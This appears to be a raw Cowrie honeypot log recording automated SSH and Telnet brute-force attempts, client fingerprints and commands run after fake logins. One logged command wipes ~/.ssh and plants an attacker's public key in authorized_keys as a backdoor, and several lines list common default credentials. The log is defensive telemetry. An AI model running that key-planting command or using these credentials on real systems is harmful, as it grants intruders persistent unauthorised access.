{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:48.215210Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:48.783938Z","src_ip":"212.227.235.229","session":"553db1602677"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:45:48.825825Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:45:48.826692Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:45:49.120497Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:49.121399Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:45:49.367316Z","src_ip":"212.227.235.229","session":"abefd3063b36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49002,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1b6c0725e21","protocol":"ssh","message":"New connection: 212.227.235.229:49002 (1.2.3.4:22) [session: d1b6c0725e21]","sensor":"my-vps","timestamp":"2025-08-31T05:45:49.403722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:45:49.404762Z","src_ip":"212.227.235.229","session":"d1b6c0725e21"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:45:49.468929Z","src_ip":"212.227.235.229","session":"abefd3063b36"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:45:49.691850Z","src_ip":"212.227.235.229","session":"d1b6c0725e21"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:45:50.881155Z","src_ip":"212.227.235.229","session":"d1b6c0725e21"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:52.170074Z","src_ip":"212.227.235.229","session":"d1b6c0725e21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50158,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5c5983cbc27","protocol":"ssh","message":"New connection: 212.227.235.229:50158 (1.2.3.4:22) [session: d5c5983cbc27]","sensor":"my-vps","timestamp":"2025-08-31T05:45:52.459504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:45:52.460165Z","src_ip":"212.227.235.229","session":"d5c5983cbc27"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:45:52.748764Z","src_ip":"212.227.235.229","session":"d5c5983cbc27"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:45:53.944842Z","src_ip":"212.227.235.229","session":"d5c5983cbc27"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:54.235746Z","src_ip":"212.227.235.229","session":"d5c5983cbc27"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:54.236863Z","src_ip":"212.227.235.229","session":"21f26adb0cd5"}
{"eventid":"cowrie.session.closed","duration":12.778993844985962,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:45:55.120789Z","src_ip":"212.227.125.160","session":"eb726ab2eda4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38842,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed2c32c5034a","protocol":"telnet","message":"New connection: 212.227.125.160:38842 (1.2.3.4:23) [session: ed2c32c5034a]","sensor":"my-vps","timestamp":"2025-08-31T05:45:55.340233Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32996,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6c87ea53cbf","protocol":"ssh","message":"New connection: 212.227.125.160:32996 (1.2.3.4:22) [session: f6c87ea53cbf]","sensor":"my-vps","timestamp":"2025-08-31T05:46:01.165707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:46:01.751658Z","src_ip":"212.227.125.160","session":"f6c87ea53cbf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:46:01.752376Z","src_ip":"212.227.125.160","session":"f6c87ea53cbf"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":37812,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c5621321449","protocol":"ssh","message":"New connection: 170.64.166.123:37812 (1.2.3.4:22) [session: 6c5621321449]","sensor":"my-vps","timestamp":"2025-08-31T05:46:02.726314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:46:02.727042Z","src_ip":"170.64.166.123","session":"6c5621321449"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:02.749319Z","src_ip":"212.227.125.160","session":"65e33d270493"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:46:03.011559Z","src_ip":"170.64.166.123","session":"6c5621321449"}
{"eventid":"cowrie.login.failed","username":"test2","password":"12345678","message":"login attempt [test2/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:04.087054Z","src_ip":"212.227.125.160","session":"f6c87ea53cbf"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"12qwaszx","message":"login attempt [oracle/12qwaszx] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:04.151731Z","src_ip":"170.64.166.123","session":"6c5621321449"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:05.427372Z","src_ip":"170.64.166.123","session":"6c5621321449"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:05.452734Z","src_ip":"212.227.125.160","session":"f6c87ea53cbf"}
{"eventid":"cowrie.session.closed","duration":12.780339241027832,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:08.120509Z","src_ip":"212.227.125.160","session":"ed2c32c5034a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39063,"dst_ip":"1.2.3.4","dst_port":23,"session":"a5a808c40ced","protocol":"telnet","message":"New connection: 212.227.125.160:39063 (1.2.3.4:23) [session: a5a808c40ced]","sensor":"my-vps","timestamp":"2025-08-31T05:46:08.339279Z"}
{"eventid":"cowrie.session.closed","duration":"63.4","message":"Connection lost after 63.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:20.385237Z","src_ip":"212.227.125.160","session":"65e33d270493"}
{"eventid":"cowrie.session.closed","duration":12.793771505355835,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:21.132979Z","src_ip":"212.227.125.160","session":"a5a808c40ced"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39283,"dst_ip":"1.2.3.4","dst_port":23,"session":"5dce5d90e66e","protocol":"telnet","message":"New connection: 212.227.125.160:39283 (1.2.3.4:23) [session: 5dce5d90e66e]","sensor":"my-vps","timestamp":"2025-08-31T05:46:21.344970Z"}
{"eventid":"cowrie.session.connect","src_ip":"104.248.146.105","src_port":52738,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ad034704f2c","protocol":"telnet","message":"New connection: 104.248.146.105:52738 (1.2.3.4:23) [session: 8ad034704f2c]","sensor":"my-vps","timestamp":"2025-08-31T05:46:28.546200Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:29.364977Z","src_ip":"104.248.146.105","session":"8ad034704f2c"}
{"eventid":"cowrie.session.closed","duration":2.8903415203094482,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:31.436471Z","src_ip":"104.248.146.105","session":"8ad034704f2c"}
{"eventid":"cowrie.session.connect","src_ip":"104.248.146.105","src_port":36810,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d2c9ebac300","protocol":"telnet","message":"New connection: 104.248.146.105:36810 (1.2.3.4:23) [session: 4d2c9ebac300]","sensor":"my-vps","timestamp":"2025-08-31T05:46:31.615574Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:46:32.712430Z","src_ip":"104.248.146.105","session":"4d2c9ebac300"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:46:32.732687Z","src_ip":"104.248.146.105","session":"4d2c9ebac300"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T05:46:32.976146Z","src_ip":"104.248.146.105","session":"4d2c9ebac300"}
{"eventid":"cowrie.session.closed","duration":12.76732063293457,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:34.112209Z","src_ip":"212.227.125.160","session":"5dce5d90e66e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:34.263033Z","src_ip":"104.248.146.105","session":"4d2c9ebac300"}
{"eventid":"cowrie.session.closed","duration":2.6521174907684326,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:34.267616Z","src_ip":"104.248.146.105","session":"4d2c9ebac300"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:34.459146Z","src_ip":"212.227.235.229","session":"abefd3063b36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36814,"dst_ip":"1.2.3.4","dst_port":22,"session":"be79f790b5c6","protocol":"ssh","message":"New connection: 212.227.125.160:36814 (1.2.3.4:22) [session: be79f790b5c6]","sensor":"my-vps","timestamp":"2025-08-31T05:46:36.642018Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50040,"dst_ip":"1.2.3.4","dst_port":22,"session":"99dd1d3bad97","protocol":"ssh","message":"New connection: 212.227.235.229:50040 (1.2.3.4:22) [session: 99dd1d3bad97]","sensor":"my-vps","timestamp":"2025-08-31T05:46:38.557331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:46:39.542235Z","src_ip":"212.227.235.229","session":"99dd1d3bad97"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:46:39.543192Z","src_ip":"212.227.235.229","session":"99dd1d3bad97"}
{"eventid":"cowrie.session.closed","duration":"58.4","message":"Connection lost after 58.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:41.512695Z","src_ip":"212.227.235.229","session":"abefd3063b36"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:46:43.874153Z","src_ip":"212.227.125.160","session":"be79f790b5c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:46:43.875202Z","src_ip":"212.227.125.160","session":"be79f790b5c6"}
{"eventid":"cowrie.login.failed","username":"test2","password":"123456789","message":"login attempt [test2/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T05:46:45.111394Z","src_ip":"212.227.235.229","session":"99dd1d3bad97"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:46:46.785247Z","src_ip":"212.227.235.229","session":"99dd1d3bad97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33900,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4959e42deea","protocol":"ssh","message":"New connection: 212.227.235.229:33900 (1.2.3.4:22) [session: f4959e42deea]","sensor":"my-vps","timestamp":"2025-08-31T05:46:53.857564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:46:53.858640Z","src_ip":"212.227.235.229","session":"f4959e42deea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41578,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfaffed9acad","protocol":"ssh","message":"New connection: 212.227.235.229:41578 (1.2.3.4:22) [session: cfaffed9acad]","sensor":"my-vps","timestamp":"2025-08-31T05:46:53.897774Z"}
